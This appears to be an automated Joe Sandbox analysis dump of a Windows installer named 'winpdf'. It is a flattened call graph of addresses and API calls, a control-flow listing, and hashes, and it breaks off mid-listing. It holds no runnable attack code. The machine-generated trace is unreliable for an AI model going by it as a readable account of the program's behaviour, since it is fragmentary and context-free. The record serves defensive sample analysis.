3870 40145c 18 API calls 3845->3870 3860 40145c 18 API calls 3846->3860 3884 4062a3 11 API calls 3847->3884 3953 40145c 3848->3953 3861 40145c 18 API calls 3849->3861 3947 401446 3850->3947 3869 40145c 18 API calls 3851->3869 3883 401446 18 API calls 3852->3883 3852->3919 3853->3919 3969 405f51 wsprintfW 3853->3969 3862 40145c 18 API calls 3854->3862 3867 40145c 18 API calls 3855->3867 3871 401647 PostQuitMessage 3856->3871 3856->3919 3868 4062a3 11 API calls 3857->3868 3858->3859 3872 401765 ShowWindow 3859->3872 3859->3919 3873 401775 3860->3873 3874 401678 3861->3874 3875 40189d 3862->3875 3876 401968 GetFullPathNameW 3863->3876 3866->3919 3879 4018e2 3867->3879 3880 4016c7 SetForegroundWindow 3868->3880 3881 40161c 3869->3881 3882 4019d1 SearchPathW 3870->3882 3871->3919 3872->3919 3885 4062a3 11 API calls 3873->3885 3887 4062a3 11 API calls 3874->3887 3965 4062d5 FindFirstFileW 3875->3965 3889 40197f 3876->3889 3931 4019a1 3876->3931 3878 40169a 3950 4062a3 lstrlenW wvsprintfW 3878->3950 3892 40145c 18 API calls 3879->3892 3880->3919 3893 4062a3 11 API calls 3881->3893 3882->3919 3883->3919 3894 401664 3884->3894 3895 401785 SetFileAttributesW 3885->3895 3896 401683 3887->3896 3914 4062d5 2 API calls 3889->3914 3889->3931 3890 4062a3 11 API calls 3898 4017c9 3890->3898 3900 4018eb 3892->3900 3901 401627 3893->3901 3902 40139d 64 API calls 3894->3902 3903 40179a 3895->3903 3895->3919 3912 404f72 25 API calls 3896->3912 3958 405d59 CharNextW CharNextW 3898->3958 3909 40145c 18 API calls 3900->3909 3910 404f72 25 API calls 3901->3910 3902->3919 3911 4062a3 11 API calls 3903->3911 3904 4018c2 3915 4062a3 11 API calls 3904->3915 3905 4018a9 3913 4062a3 11 API calls 3905->3913 3908 4019b8 GetShortPathNameW 3908->3919 3917 4018f5 3909->3917 3910->3919 3911->3919 3912->3919 3913->3919 3918 401991 3914->3918 3915->3919 3916 4017d4 3920 401864 3916->3920 3923 405d06 CharNextW 3916->3923 3938 4062a3 11 API calls 3916->3938 3921 4062a3 11 API calls 3917->3921 3918->3931 3968 406009 lstrcpynW 3918->3968 3919->3838 3920->3896 3922 40186e 3920->3922 3924 401902 MoveFileW 3921->3924 3925 404f72 25 API calls 3922->3925 3927 4017e6 CreateDirectoryW 3923->3927 3928 401912 3924->3928 3929 40191e 3924->3929 3930 401875 3925->3930 3927->3916 3932 4017fe GetLastError 3927->3932 3928->3896 3933 401942 3929->3933 3934 4062d5 2 API calls 3929->3934 3964 406009 lstrcpynW 3930->3964 3931->3908 3931->3919 3936 401827 GetFileAttributesW 3932->3936 3937 40180b GetLastError 3932->3937 3941 4062a3 11 API calls 3933->3941 3939 401929 3934->3939 3936->3916 3942 4062a3 11 API calls 3937->3942 3938->3916 3939->3933 3944 406c68 42 API calls 3939->3944 3940 401882 SetCurrentDirectoryW 3940->3919 3943 40195c 3941->3943 3942->3916 3943->3919 3945 401936 3944->3945 3946 404f72 25 API calls 3945->3946 3946->3933 3948 406805 18 API calls 3947->3948 3949 401455 3948->3949 3949->3878 3951 4060e7 9 API calls 3950->3951 3952 4016a7 Sleep 3951->3952 3952->3919 3954 406805 18 API calls 3953->3954 3955 401488 3954->3955 3956 401497 3955->3956 3957 406038 5 API calls 3955->3957 3956->3890 3957->3956 3959 405d76 3958->3959 3960 405d88 3958->3960 3959->3960 3961 405d83 CharNextW 3959->3961 3962 405dac 3960->3962 3963 405d06 CharNextW 3960->3963 3961->3962 3962->3916 3963->3960 3964->3940 3966 4018a5 3965->3966 3967 4062eb FindClose 3965->3967 3966->3904 3966->3905 3967->3966 3968->3931 3969->3919 3970->3831 3972 403c91 3971->3972 3973 403c96 FreeLibrary GlobalFree 3972->3973 3974 403876 3972->3974 3973->3973 3973->3974 3975 406c9b 3974->3975 3976 40677e 18 API calls 3975->3976 3977 406cae 3976->3977 3978 406cb7 DeleteFileW 3977->3978 3979 406cce 3977->3979 4018 403882 CoUninitialize 3978->4018 3980 406e4b 3979->3980 4023 406009 lstrcpynW 3979->4023 3986 4062d5 2 API calls 3980->3986 4007 406e58 3980->4007 3980->4018 3982 406cf9 3983 406d03 lstrcatW 3982->3983 3984 406d0d 3982->3984 3985 406d13 3983->3985 3987 406751 2 API calls 3984->3987 3989 406d23 lstrcatW 3985->3989 3990 406d19 3985->3990 3988 406e64 3986->3988 3987->3985 3993 406722 3 API calls 3988->3993 3988->4018 3992 406d2b lstrlenW FindFirstFileW 3989->3992 3990->3989 3990->3992 3991 4062a3 11 API calls 3991->4018 3997 406e3b 3992->3997 4021 406d52 3992->4021 3994 406e6e 3993->3994 3996 4062a3 11 API calls 3994->3996 3995 405d06 CharNextW 3995->4021 3998 406e79 3996->3998 3997->3980 3999 405e30 2 API calls 3998->3999 4001 406e81 RemoveDirectoryW 3999->4001 4004 406ec4 4001->4004 4005 406e8d 4001->4005 4002 406e18 FindNextFileW 4003 406e30 FindClose 4002->4003 4002->4021 4003->3997 4006 404f72 25 API calls 4004->4006 4005->4007 4008 406e93 4005->4008 4006->4018 4007->3991 4010 4062a3 11 API calls 4008->4010 4009 4062a3 11 API calls 4009->4021 4012 406e9d 4010->4012 4011 406c9b 72 API calls 4011->4021 4014 404f72 25 API calls 4012->4014 4015 406ea7 4014->4015 4017 406c68 42 API calls 4015->4017 4017->4018 4018->3502 4018->3503 4019 404f72 25 API calls 4019->4002 4020 404f72 25 API calls 4020->4021 4021->3995 4021->4002 4021->4009 4021->4011 4021->4019 4021->4020 4022 406c68 42 API calls 4021->4022 4024 406009 lstrcpynW 4021->4024 4025 405e30 GetFileAttributesW 4021->4025 4022->4021 4023->3982 4024->4021 4026 405e4d DeleteFileW 4025->4026 4027 405e3f SetFileAttributesW 4025->4027 4026->4021 4027->4026 4028->3664 4029->3688 4030->3707 4031->3707 4032->3696 4034 406ae7 GetShortPathNameW 4033->4034 4035 406abe 4033->4035 4036 406b00 4034->4036 4037 406c62 4034->4037 4059 405e50 GetFileAttributesW CreateFileW 4035->4059 4036->4037 4040 406b08 WideCharToMultiByte 4036->4040 4037->3717 4039 406ac7 CloseHandle GetShortPathNameW 4039->4037 4041 406adf 4039->4041 4040->4037 4042 406b25 WideCharToMultiByte 4040->4042 4041->4034 4041->4037 4042->4037 4043 406b3d wsprintfA 4042->4043 4044 406805 18 API calls 4043->4044 4045 406b69 4044->4045 4060 405e50 GetFileAttributesW CreateFileW 4045->4060 4047 406b76 4047->4037 4048 406b83 GetFileSize GlobalAlloc 4047->4048 4049 406ba4 ReadFile 4048->4049 4050 406c58 CloseHandle 4048->4050 4049->4050 4051 406bbe 4049->4051 4050->4037 4051->4050 4061 405db6 lstrlenA 4051->4061 4054 406bd7 lstrcpyA 4057 406bf9 4054->4057 4055 406beb 4056 405db6 4 API calls 4055->4056 4056->4057 4058 406c30 SetFilePointer WriteFile GlobalFree 4057->4058 4058->4050 4059->4039 4060->4047 4062 405df7 lstrlenA 4061->4062 4063 405dd0 lstrcmpiA 4062->4063 4064 405dff 4062->4064 4063->4064 4065 405dee CharNextA 4063->4065 4064->4054 4064->4055 4065->4062 4913 402a84 4914 401553 19 API calls 4913->4914 4915 402a8e 4914->4915 4916 401446 18 API calls 4915->4916 4917 402a98 4916->4917 4918 402ab2 RegEnumKeyW 4917->4918 4919 402abe RegEnumValueW 4917->4919 4921 401a13 4917->4921 4920 402a7e 4918->4920 4919->4920 4919->4921 4920->4921 4922 4029e4 RegCloseKey 4920->4922 4922->4921 4923 402c8a 4924 402ca2 4923->4924 4925 402c8f 4923->4925 4927 40145c 18 API calls 4924->4927 4926 401446 18 API calls 4925->4926 4929 402c97 4926->4929 4928 402ca9 lstrlenW 4927->4928 4928->4929 4930 402ccb WriteFile 4929->4930 4931 401a13 4929->4931 4930->4931 4932 40400d 4933 40406a 4932->4933 4934 40401a lstrcpynA lstrlenA 4932->4934 4934->4933 4935 40404b 4934->4935 4935->4933 4936 404057 GlobalFree 4935->4936 4936->4933 4937 401d8e 4938 40145c 18 API calls 4937->4938 4939 401d95 ExpandEnvironmentStringsW 4938->4939 4940 401da8 4939->4940 4942 401db9 4939->4942 4941 401dad lstrcmpW 4940->4941 4940->4942 4941->4942 4943 401e0f 4944 401446 18 API calls 4943->4944 4945 401e17 4944->4945 4946 401446 18 API calls 4945->4946 4947 401e21 4946->4947 4948 4030e3 4947->4948 4950 405f51 wsprintfW 4947->4950 4950->4948 4951 402392 4952 40145c 18 API calls 4951->4952 4953 402399 4952->4953 4956 4071f8 4953->4956 4957 406ed2 25 API calls 4956->4957 4958 407218 4957->4958 4959 407222 lstrcpynW lstrcmpW 4958->4959 4960 4023a7 4958->4960 4961 407254 4959->4961 4962 40725a lstrcpynW 4959->4962 4961->4962 4962->4960 4066 402713 4081 406009 lstrcpynW 4066->4081 4068 40272c 4082 406009 lstrcpynW 4068->4082 4070 402738 4071 40145c 18 API calls 4070->4071 4073 402743 4070->4073 4071->4073 4072 402752 4075 402761 4072->4075 4076 40145c 18 API calls 4072->4076 4073->4072 4074 40145c 18 API calls 4073->4074 4074->4072 4077 40145c 18 API calls 4075->4077 4076->4075 4078 40276b 4077->4078 4079 4062a3 11 API calls 4078->4079 4080 40277f WritePrivateProfileStringW 4079->4080 4081->4068 4082->4070 4963 402797 4964 40145c 18 API calls 4963->4964 4965 4027ae 4964->4965 4966 40145c 18 API calls 4965->4966 4967 4027b7 4966->4967 4968 40145c 18 API calls 4967->4968 4969 4027c0 GetPrivateProfileStringW lstrcmpW 4968->4969 4970 402e18 4971 40145c 18 API calls 4970->4971 4972 402e1f FindFirstFileW 4971->4972 4973 402e32 4972->4973 4978 405f51 wsprintfW 4973->4978 4975 402e43 4979 406009 lstrcpynW 4975->4979 4977 402e50 4978->4975 4979->4977 4980 401e9a 4981 40145c 18 API calls 4980->4981 4982 401ea1 4981->4982 4983 401446 18 API calls 4982->4983 4984 401eab wsprintfW 4983->4984 4269 401a1f 4270 40145c 18 API calls 4269->4270 4271 401a26 4270->4271 4272 4062a3 11 API calls 4271->4272 4273 401a49 4272->4273 4274 401a64 4273->4274 4275 401a5c 4273->4275 4323 406009 lstrcpynW 4274->4323 4322 406009 lstrcpynW 4275->4322 4278 401a6f 4280 406722 3 API calls 4278->4280 4279 401a62 4282 406038 5 API calls 4279->4282 4281 401a75 lstrcatW 4280->4281 4281->4279 4285 401a81 4282->4285 4283 4062d5 2 API calls 4283->4285 4285->4283 4286 405e30 2 API calls 4285->4286 4287 401a98 CompareFileTime 4285->4287 4288 401ba9 4285->4288 4290 401b5d 4285->4290 4292 4062a3 11 API calls 4285->4292 4300 406009 lstrcpynW 4285->4300 4303 406805 18 API calls 4285->4303 4312 405ca0 MessageBoxIndirectW 4285->4312 4314 401b50 4285->4314 4321 405e50 GetFileAttributesW CreateFileW 4285->4321 4286->4285 4287->4285 4289 404f72 25 API calls 4288->4289 4291 401bb3 4289->4291 4293 404f72 25 API calls 4290->4293 4294 40337f 37 API calls 4291->4294 4292->4285 4295 401b70 4293->4295 4296 401bc6 4294->4296 4298 4062a3 11 API calls 4295->4298 4297 4062a3 11 API calls 4296->4297 4299 401bda 4297->4299 4305 401b8b 4298->4305 4301 401be9 SetFileTime 4299->4301 4302 401bf8 CloseHandle 4299->4302 4300->4285 4301->4302 4304 401c09 4302->4304 4302->4305 4303->4285 4306 401c21 4304->4306 4307 401c0e 4304->4307 4308 406805 18 API calls 4306->4308 4309 406805 18 API calls 4307->4309 4311 401c29 4308->4311 4310 401c16 lstrcatW 4309->4310 4310->4311 4313 4062a3 11 API calls 4311->4313 4312->4285 4315 401c34 4313->4315 4316 401b93 4314->4316 4317 401b53 4314->4317 4318 405ca0 MessageBoxIndirectW 4315->4318 4319 4062a3 11 API calls 4316->4319 4320 4062a3 11 API calls 4317->4320 4318->4305 4319->4305 4320->4290 4321->4285 4322->4279 4323->4278 4985 40209f GetDlgItem GetClientRect 4986 40145c 18 API calls 4985->4986 4987 4020cf LoadImageW 4986->4987 4988 4020e5 4987->4988 4989 4030e3 4988->4989 4990 4020ed DeleteObject 4988->4990 4990->4989 4991 402b9f 4992 401446 18 API calls 4991->4992 4997 402ba7 4992->4997 4993 402c4a 4994 401446 18 API calls 4996 402c3d 4994->4996 4995 402bdf ReadFile 4995->4996 4995->4997 4996->4993 4996->4994 5003 402d17 ReadFile 4996->5003 4997->4993 4997->4995 4997->4996 4998 402c06 MultiByteToWideChar 4997->4998 4999 402c3f 4997->4999 5002 402c4f 4997->5002 4998->4997 4998->5002 5004 405f51 wsprintfW 4999->5004 5001 402c6b SetFilePointer 5001->4996 5002->4996 5002->5001 5003->4996 5004->4993 5005 402b23 GlobalAlloc 5006 402b39 5005->5006 5007 402b4b 5005->5007 5008 401446 18 API calls 5006->5008 5009 40145c 18 API calls 5007->5009 5011 402b41 5008->5011 5010 402b52 WideCharToMultiByte lstrlenA 5009->5010 5010->5011 5012 402b84 WriteFile 5011->5012 5014 402b93 5011->5014 5013 402384 GlobalFree 5012->5013 5012->5014 5013->5014 5016 4044a5 5017 404512 5016->5017 5018 4044df 5016->5018 5019 40451f GetDlgItem GetAsyncKeyState 5017->5019 5027 4045b1 5017->5027 5080 405c84 GetDlgItemTextW 5018->5080 5021 40453e GetDlgItem 5019->5021 5030 40455c 5019->5030 5024 403d3f 19 API calls 5021->5024 5022 40469d 5078 404821 5022->5078 5081 405c84 GetDlgItemTextW 5022->5081 5023 4044ea 5025 406038 5 API calls 5023->5025 5026 404551 ShowWindow 5024->5026 5028 4044f0 5025->5028 5026->5030 5027->5022 5033 406805 18 API calls 5027->5033 5027->5078 5032 403e74 5 API calls 5028->5032 5035 404579 SetWindowTextW 5030->5035 5042 405d59 4 API calls 5030->5042 5031 403dca 8 API calls 5036 404847 5031->5036 5037 4044f5 GetDlgItem 5032->5037 5038 40462f SHBrowseForFolderW 5033->5038 5034 4046c9 5039 40677e 18 API calls 5034->5039 5043 403d3f 19 API calls 5035->5043 5044 404503 IsDlgButtonChecked 5037->5044 5037->5078 5038->5022 5040 404647 CoTaskMemFree 5038->5040 5041 4046cf 5039->5041 5045 406722 3 API calls 5040->5045 5082 406009 lstrcpynW 5041->5082 5046 40456f 5042->5046 5047 404597 5043->5047 5044->5017 5049 404654 5045->5049 5046->5035 5054 406722 3 API calls 5046->5054 5048 403d3f 19 API calls 5047->5048 5051 4045a2 5048->5051 5052 40468b SetDlgItemTextW 5049->5052 5056 406805 18 API calls 5049->5056 5058 4062fc 3 API calls 5051->5058 5052->5022 5053 4046e6 5055 4062fc 3 API calls 5053->5055 5054->5035 5057 4046ee 5055->5057 5059 404673 lstrcmpiW 5056->5059 5060 404730 5057->5060 5068 406751 2 API calls 5057->5068 5069 404785 5057->5069 5058->5027 5059->5052 5062 404684 lstrcatW 5059->5062 5083 406009 lstrcpynW 5060->5083 5062->5052 5063 404739 5064 405d59 4 API calls 5063->5064 5065 40473f GetDiskFreeSpaceW 5064->5065 5067 404763 MulDiv 5065->5067 5065->5069 5067->5069 5068->5057 5070 4047e2 5069->5070 5071 4043ad 21 API calls 5069->5071 5072 404805 5070->5072 5074 40141d 79 API calls 5070->5074 5073 4047d3 5071->5073 5084 403d85 KiUserCallbackDispatcher 5072->5084 5076 4047e4 SetDlgItemTextW 5073->5076 5077 4047d8 5073->5077 5074->5072 5076->5070 5079 4043ad 21 API calls 5077->5079 5078->5031 5079->5070 5080->5023 5081->5034 5082->5053 5083->5063 5084->5078 5085 402da5 5086 402dac 5085->5086 5088 4030e3 5085->5088 5087 401446 18 API calls 5086->5087 5089 402db8 5087->5089 5090 402dbf SetFilePointer 5089->5090 5090->5088 5091 402dcf 5090->5091 5091->5088 5093 405f51 wsprintfW 5091->5093 5093->5088 5094 4030a9 5095 4030bd 5094->5095 5096 4030c2 InvalidateRect 5095->5096 5097 4030e3 5095->5097 5096->5097 5098 401cb2 5099 40145c 18 API calls 5098->5099 5100 401c54 5099->5100 5101 401c64 5100->5101 5102 4062a3 11 API calls 5100->5102 5103 401c59 5102->5103 5104 406c9b 81 API calls 5103->5104 5104->5101 4093 4021b5 4094 40145c 18 API calls 4093->4094 4095 4021bb 4094->4095 4096 40145c 18 API calls 4095->4096 4097 4021c4 4096->4097 4098 40145c 18 API calls 4097->4098 4099 4021cd 4098->4099 4100 40145c 18 API calls 4099->4100 4101 4021d6 4100->4101 4102 404f72 25 API calls 4101->4102 4103 4021e2 ShellExecuteW 4102->4103 4104 40221b 4103->4104 4105 40220d 4103->4105 4107 4062a3 11 API calls 4104->4107 4106 4062a3 11 API calls 4105->4106 4106->4104 4108 402230 4107->4108 5112 402238 5113 40145c 18 API calls 5112->5113 5114 40223e 5113->5114 5115 4062a3 11 API calls 5114->5115 5116 40224b 5115->5116 5117 404f72 25 API calls 5116->5117 5118 402255 5117->5118 5119 405c3f 2 API calls 5118->5119 5120 40225b 5119->5120 5121 4062a3 11 API calls 5120->5121 5129 4022ac CloseHandle 5120->5129 5126 40226d 5121->5126 5123 4030e3 5124 402283 WaitForSingleObject 5125 402291 GetExitCodeProcess 5124->5125 5124->5126 5128 4022a3 5125->5128 5125->5129 5126->5124 5127 406332 2 API calls 5126->5127 5126->5129 5127->5124 5131 405f51 wsprintfW 5128->5131 5129->5123 5131->5129 5132 4040b8 5133 4040d3 5132->5133 5138 404201 5132->5138 5134 40410e 5133->5134 5161 403fca WideCharToMultiByte 5133->5161 5142 403d3f 19 API calls 5134->5142 5135 40433e 5143 403dca 8 API calls 5135->5143 5136 404276 GetDlgItem 5139 404290 5136->5139 5140 4042ff 5136->5140 5138->5135 5141 40423b GetDlgItem SendMessageW 5138->5141 5151 404267 5138->5151 5139->5140 5148 4042b6 6 API calls 5139->5148 5140->5135 5144 404311 5140->5144 5165 403d85 KiUserCallbackDispatcher 5141->5165 5146 40414e 5142->5146 5147 404339 5143->5147 5149 404327 5144->5149 5150 404317 SendMessageW 5144->5150 5152 403d3f 19 API calls 5146->5152 5148->5140 5149->5147 5153 40432d SendMessageW 5149->5153 5150->5149 5151->5135 5151->5136 5154 40415b CheckDlgButton 5152->5154 5153->5147 5164 403d85 KiUserCallbackDispatcher 5154->5164 5156 404179 GetDlgItem 5157 403d98 5156->5157 5158 40418f SendMessageW 5157->5158 5159 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5158->5159 5160 4041ac GetSysColor 5158->5160 5159->5147 5160->5159 5162 404007 5161->5162 5163 403fe9 GlobalAlloc WideCharToMultiByte 5161->5163 5162->5134 5163->5162 5164->5156 5165->5151 4186 401eb9 4187 401f24 4186->4187 4191 401ec6 4186->4191 4188 401f53 GlobalAlloc 4187->4188 4190 401f28 4187->4190 4193 406805 18 API calls 4188->4193 4189 401ed5 4192 4062a3 11 API calls 4189->4192 4194 4062a3 11 API calls 4190->4194 4198 401f36 4190->4198 4191->4189 4195 401ef7 4191->4195 4205 401ee2 4192->4205 4197 401f46 4193->4197 4194->4198 4208 406009 lstrcpynW 4195->4208 4200 402708 4197->4200 4201 402387 GlobalFree 4197->4201 4210 406009 lstrcpynW 4198->4210 4201->4200 4202 401f06 4209 406009 lstrcpynW 4202->4209 4203 406805 18 API calls 4203->4205 4205->4200 4205->4203 4206 401f15 4211 406009 lstrcpynW 4206->4211 4208->4202 4209->4206 4210->4197 4211->4200 5166 4074bb 5167 407344 5166->5167 5168 407c6d 5167->5168 5169 4073c2 GlobalFree 5167->5169 5170 4073cb GlobalAlloc 5167->5170 5171 407443 GlobalAlloc 5167->5171 5172 40743a GlobalFree 5167->5172 5169->5170 5170->5167 5170->5168 5171->5167 5171->5168 5172->5171

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 4 4052c6-4052d3 1->4 5 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->5 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 7 4052f4-4052fb 4->7 8 4052d5-4052de 4->8 5->4 12 405352-405356 7->12 13 4052fd-405303 7->13 10 4052e0-4052ef ShowWindow * 2 call 403d98 8->10 11 405316-40531f call 403dca 8->11 10->7 21 405324-405328 11->21 12->11 18 405358-40535b 12->18 14 405305-405311 call 403d18 13->14 15 40532b-40533b ShowWindow 13->15 14->11 22 40534b-40534d call 403d18 15->22 23 40533d-405346 call 404f72 15->23 18->11 25 40535d-405370 18->25 22->12 23->22 32 405376-405397 CreatePopupMenu call 406805 AppendMenuW 25->32 33 40528e-405290 25->33 40 405399-4053aa GetWindowRect 32->40 41 4053ac-4053b2 32->41 33->21 38 405206-40521d call 403d3f 35->38 39 4051f8-405204 SendMessageW 35->39 36->35 45 405253-405274 GetDlgItem SendMessageW 38->45 46 40521f-405233 ShowWindow 38->46 39->38 43 4053b3-4053cb TrackPopupMenu 40->43 41->43 43->33 47 4053d1-4053e8 43->47 45->33 50 405276-40528c SendMessageW * 2 45->50 48 405242 46->48 49 405235-405240 ShowWindow 46->49 51 4053ed-405408 47->51 52 405248-40524e call 403d98 48->52 49->52 50->33 55 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 51->55 52->45 56 40542f-405458 55->56 58 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 56->58 58->33
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                                  • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                • String ID: @rD$New install of "%s" to "%s"$`7:v${
                                                                                                                                                                • API String ID: 2110491804-3229798668
                                                                                                                                                                • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                                                                                • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                                                                                • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 310 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 317 403923-403937 call 405d06 CharNextW 310->317 318 40391b-40391e 310->318 321 4039ca-4039d0 317->321 318->317 322 4039d6 321->322 323 40393c-403942 321->323 324 4039f5-403a0d GetTempPathW call 4037cc 322->324 325 403944-40394a 323->325 326 40394c-403950 323->326 335 403a33-403a4d DeleteFileW call 403587 324->335 336 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 324->336 325->325 325->326 328 403952-403957 326->328 329 403958-40395c 326->329 328->329 331 4039b8-4039c5 call 405d06 329->331 332 40395e-403965 329->332 331->321 347 4039c7 331->347 333 403967-40396e 332->333 334 40397a-40398c call 403800 332->334 338 403970-403973 333->338 339 403975 333->339 348 4039a1-4039b6 call 403800 334->348 349 40398e-403995 334->349 350 403acc-403adb call 403859 CoUninitialize 335->350 351 403a4f-403a55 335->351 336->335 336->350 338->334 338->339 339->334 347->321 348->331 366 4039d8-4039f0 call 407d6e call 406009 348->366 355 403997-40399a 349->355 356 40399c 349->356 364 403ae1-403af1 call 405ca0 ExitProcess 350->364 365 403bce-403bd4 350->365 352 403ab5-403abc call 40592c 351->352 353 403a57-403a60 call 405d06 351->353 363 403ac1-403ac7 call 4060e7 352->363 367 403a79-403a7b 353->367 355->348 355->356 356->348 363->350 370 403c51-403c59 365->370 371 403bd6-403bf3 call 4062fc * 3 365->371 366->324 375 403a62-403a74 call 403800 367->375 376 403a7d-403a87 367->376 377 403c5b 370->377 378 403c5f 370->378 402 403bf5-403bf7 371->402 403 403c3d-403c48 ExitWindowsEx 371->403 375->376 389 403a76 375->389 383 403af7-403b11 lstrcatW lstrcmpiW 376->383 384 403a89-403a99 call 40677e 376->384 377->378 383->350 388 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 383->388 384->350 396 403a9b-403ab1 call 406009 * 2 384->396 392 403b36-403b56 call 406009 * 2 388->392 393 403b2b-403b31 call 406009 388->393 389->367 410 403b5b-403b77 call 406805 DeleteFileW 392->410 393->392 396->352 402->403 407 403bf9-403bfb 402->407 403->370 406 403c4a-403c4c call 40141d 403->406 406->370 407->403 412 403bfd-403c0f GetCurrentProcess 407->412 417 403bb8-403bc0 410->417 418 403b79-403b89 CopyFileW 410->418 412->403 416 403c11-403c33 412->416 416->403 417->410 419 403bc2-403bc9 call 406c68 417->419 418->417 420 403b8b-403bab call 406c68 call 406805 call 405c3f 418->420 419->350 420->417 430 403bad-403bb4 CloseHandle 